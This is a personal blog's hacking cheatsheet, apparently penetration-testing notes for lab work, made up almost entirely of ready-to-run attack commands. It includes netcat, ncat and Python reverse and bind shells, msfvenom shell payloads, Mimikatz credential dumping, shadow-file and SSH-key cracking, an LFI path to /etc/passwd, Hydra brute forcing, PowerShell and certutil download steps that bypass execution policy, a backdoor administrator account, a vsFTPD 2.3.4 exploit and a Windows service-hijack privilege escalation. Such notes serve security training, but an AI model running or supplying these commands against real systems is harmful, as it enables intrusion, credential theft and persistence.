Blog
Search…
Blog
Welcome to egonzalez blog
Hacking
Index
Hack the box writeups
Python Vulnerabilities
Hacking cheatsheet
OpenStack
Index
Docker and DevOps
Index
Powered By GitBook
Hacking cheatsheet
Hacking command list

Netcat

Connect to port
1
nc -nv 192.168.1.10 110
Copied!
Bind port and connect to:
1
nc -nlvp 4444
2
nc -nv 192.168.1.10 4444
Copied!
Copy files
1
nc -nlvp 4444 > dest-file
2
nc -nv 192.168.1.10 4444 < local-file
Copied!
Bind shell and remote execution
1
nc -nlvp 4444 -e cmd.exe
2
nc -nv 192.168.1.10 4444
Copied!
Reverse shell
1
nc -nlvp 4444
2
nc -nv 192.168.1.10 4444 -e /bin/bash
Copied!
Scan ports
1
nc -nvv -w 1 -z 192.168.1.10 3388-3390
Copied!

Ncat

Bind shell SSL with allow IP address
1
ncat --exec cmd.exe --allow 192.168.1.11 -vnl 4444 --ssl
2
ncat -v 192.168.1.10 4444 --ssl
Copied!
Reverse shell SSL
1
ncat -vnl 4444 --ssl
2
ncat -nv 192.168.1.10 4444 --ssl --exec /bin/bash
Copied!

Tcpdump

Load a .pcap file
1
tcpdump -r file.pcap
Copied!
Filter by source host
1
tcpdump -n src host 172.16.40.10
Copied!
Filter by destination host
1
tcpdump -n dst host 172.16.40.10
Copied!
Filter by port
1
tcpdump -n port 80
Copied!
Print packet data in HEX and ASCI
1
tcpdump -nXX
Copied!
Packets with ACK or PSH flags set
1
tcpdump -A -n 'tcp[13] = 24'
Copied!
Print HEX data on an 1500 MTU card
1
tcpdump -i tap0 -nXX -s 1500 port 110
Copied!

The harvester

Search all sources for email
1
theharvester -d domain.com -b all
Copied!
Search employees on linkedin
1
theharvester -d domain.com -b linkedin
Copied!
Search emails and query hosts in shodan
1
theharvester -d domain.com -b bing -h
Copied!

host

Find name servers
1
host -t ns domain.com
Copied!
Find mail servers
1
host -t mx domain.com
Copied!
Find address and mail servers
1
host domain.com
Copied!
Reverse lookup
1
host 1.2.3.4
Copied!
Transfer DNS zone
1
host -l domain.com domain-nameserver.com
Copied!
Try all NS DNS zone transfer
1
HOST=host.com; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done
Copied!

dnsrecon

Try DNS zone transfer
1
dnsrecon -d domain.com -t axfr
Copied!

dnsenum

Enumerate host in a domain
1
dnsenum domain.com
Copied!

Nmap

TCP syn/ack scan
1
nmap -sT 10.11.11.123
Copied!
Scan all ports
1
nmap -sS 1.1.1.1 -p-
Copied!
Identify host in the network (ICMP)
1
nmap -sn -v 10.11.1.1-254 -oG host.txt
Copied!
Scan port 80 on all hosts
1
nmap -p 80 10.11.1.1-254 -oG web-host.txt
Copied!
OS, port, version, traceroute and script scan of top 20 port in a range
1
nmap -sT -A -top-ports=20 10.11.1.1-254 -oG top-ports.txt
Copied!
OS scan
1
nmap -O 10.11.11.123
Copied!
Service Version scan
1
nmap -sV -sT 10.11.11.123
Copied!
Script discover nsb and host version
1
nmap 10.11.11.123 -p 139,445 --script smb-os-discovery.nse
Copied!
Script DNS zone transfer
1
nmap --script dns-zone-transfer -p 53 ns2.domain.com
Copied!
Scan for smb services (139-netbios,445-microsoft-ds)
1
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
Copied!
Enum http path
1
nmap -v -p 80 192.168.56.101 --script http-enum.ns
Copied!

SMB

Discover SMB hosts in a network, get IP, NetBIOS name and users
1
nbtscan -r 10.11.1.0/24
Copied!
Discover SMB host info
1
enum4linux -a 10.11.1.227
Copied!
Search specific vulnerability
1
nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1 10.13.10.4
Copied!
Enumerate shares
1
nmap --script smb-enum-shares 10.13.10.4 -p139,445 -T4
Copied!
Map smb shares
1
smbmap -H 10.14.15.16 -u guest
Copied!
Mount share
1
mount -t cifs -o vers=1.0,username=guest,password="" //10.11.12.13/wwwroot /tmp/path
Copied!

SMTP

Connect smtp
1
nc -nv 192.168.56.101 25
2
# Check if user exists
3
VRFY root
Copied!

SNMP

  • Port: 161
  • Type: UDP
Scan strings [community, public, manager, etc]
1
onesixtyone -c snmp_strings.txt 127.0.0.1
Copied!
Enumerate MIB tree
1
snmpwalk -c public -v1 127.0.0.1
Copied!
Enumerate some SMTP OID
1
snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>
Copied!

msfvenom

PHP reverse shell
1
msfvenom -p php/reverse_php LHOST=10.11.0.49 LPORT=443 -f raw > shell.php
Copied!
Windows bind port (No firewall enabled)
1
msfvenom -p windows/shell_bind_tcp R LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Copied!
Microsoft ASP .net reverse shell
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=4445 -f asp > shell.asp
Copied!
Create windows executable
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe
Copied!

GCC / compilation

Regular compilation
1
gcc -o OpenFuck 47080.c -lcrypto
Copied!
Cross compile x86 in x86_64 host
1
gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
2
gcc -m32 -Wl,--hash-style=both -o udev udev.c
Copied!

Nikto

Analise web with default settings
1
nikto -host http://10.11.1.10
Copied!

dirb

Scan web service directories and files
1
dirb http://192.168.1.10
Copied!
Scan non recursively, non show attempts and bigger words list
1
dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt -r -S
Copied!

FTP

Non interactive FTP download from windows
1
echo open 10.11.0.49 21 > ftp.txt
2
echo USER xnaaro >> ftp.txt
3
echo 12345>> ftp.txt
4
echo bin >> ftp.txt
5
echo GET wget.exe >> ftp.txt
6
echo bye >> ftp.txt
7
ftp -v -n -s:ftp.txt
Copied!

Mimikatz

Non interactive hash dump
1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
Copied!

Webserver

Create a python webserver
1
python -m SimpleHTTPServer 80
Copied!

NoSQLmap

1
python nosqlmap.py --attack 2 --victim host.name --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON
Copied!

NoSQl user/pass enum

1
# Git repository: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
2
python3 nosqli_enumeration.py -u http://localhost/index.php -up email -pp password -ep password -m POST
Copied!

Searchsploit

Search exploit
1
searchsploit <name>
Copied!
See exploit code
1
searchsploit -x /path/exploit
Copied!
Copy exploit current location
1
searchsploit -m path/exploit
Copied!

John the ripper

Merge passwd and shadow files
1
unshadow /etc/passwd /etc/shadow > unshadow.txt
Copied!
Crack passwords
1
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pass.txt
Copied!
Crack SSH key passphrase
1
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
2
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Copied!
Mutate cewl dictionary
1
john --wordlist=cewl_words.txt --rules --stdout > mutated_words
Copied!

hashcat

Crack linux passwords
1
hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force
Copied!

File inclusion

LFI example
1
http://10.12.13.14/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
Copied!

Shells

Python interactive bash shell
1
python -c 'import pty;pty.spawn("/bin/bash")'
2
export TERM=xterm && export SHELL=bash
Copied!
Scape restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names
1
BASH_CMDS[a]=/bin/sh;a
2
export PATH=$PATH:/bin/
3
export PATH=$PATH:/usr/bin
Copied!
Python reverse shell
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.49",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Copied!

Mysql

Non interactive queries
1
mysql -u <user> -p<passwd> -D otrs -e "show databases;"
Copied!

Robots.txt

Crawl robots txt as a search engine agent
1
curl --user-agent Googlebot http://10.11.12.13/robots.txt -v
Copied!

Hydra

Generate passwds from web words
1
cewl http://10.11.12.13 -m 2 -w output
Copied!
Brute force logging
1
hydra -L usernames.txt -P passwords.txt <IP> <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail"
2
# Example
3
hydra -L usernames -P output 10.11.12.13 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:F=Login"
Copied!

Fuzzing

ffuz

Silent fuzzing
1
ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.168:8080/FUZZ
Copied!

Whatweb

1
$ whatweb http://10.10.10.168:8080
2
http://10.10.10.168:8080 [200 OK] Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[BadHTTPServer], IP[10.10.10.168], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]
3
​
Copied!

Windows commands

Create admin user with RDP
1
net user xnaaro 12345 /add
2
net localgroup administrators xnaaro /add
3
net localgroup "Remote Desktop Users" xnaaro /add
Copied!
Quick local enumeration
1
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!

Downloads

Download file with powershell
  • Option 1
1
echo (New-Object System.Net.WebClient).DownloadFile("http://10.11.0.49/wget.exe", "wget.exe") > wget.ps1
2
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copied!
  • Option 2
1
PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.49/wget.exe','wget.exe')
Copied!
Non interactive download
1
echo $storageDir = $pwd > wget.ps1
2
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
3
echo $url = "http://10.11.0.49/wget.exe" >>wget.ps1
4
echo $file = "wget.exe" >>wget.ps1
5
echo $webclient.DownloadFile($url,$file) >>wget.ps1
6
​
7
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copied!
Download file with certutil
1
certutil -urlcache -split -f "http://10.11.0.49/wget.exe" wget.exe
Copied!

Windows exploit suggester

Copy systeminfo to local host
1
./windows-exploit-suggester.py --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo
Copied!

Well know exploits

Common vulnerabilities

vsFTPD 2.3.4

Exploit and reverse shell
1
python3 vsftpd_234_exploit.py 192.168.56.101 21 "sh -c 'nc -nv 192.168.56.1 44444 -e /bin/bash > /dev/null 2>&1 &'"
Copied!

Windows XP SP1 priv escalation

1
sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10.11.0.49 10000 -e C:\WINDOWS\System32\cmd.exe"
2
sc config upnphost obj= ".\LocalSystem" password= ""
3
sc qc upnphost
4
net start upnphost
Copied!
Previous
YAML
Next - OpenStack
Index
Last modified 2yr ago
Copy link
Contents
Netcat
Ncat
Tcpdump
The harvester
host
dnsrecon
dnsenum
Nmap
SMB
SMTP
SNMP
msfvenom
GCC / compilation
Nikto
dirb
FTP
Mimikatz
Webserver
NoSQLmap
NoSQl user/pass enum
Searchsploit
John the ripper
hashcat
File inclusion
Shells
Mysql
Robots.txt
Hydra
Fuzzing
ffuz
Whatweb
Windows commands
Downloads
Windows exploit suggester
Well know exploits
Common vulnerabilities
vsFTPD 2.3.4
Windows XP SP1 priv escalation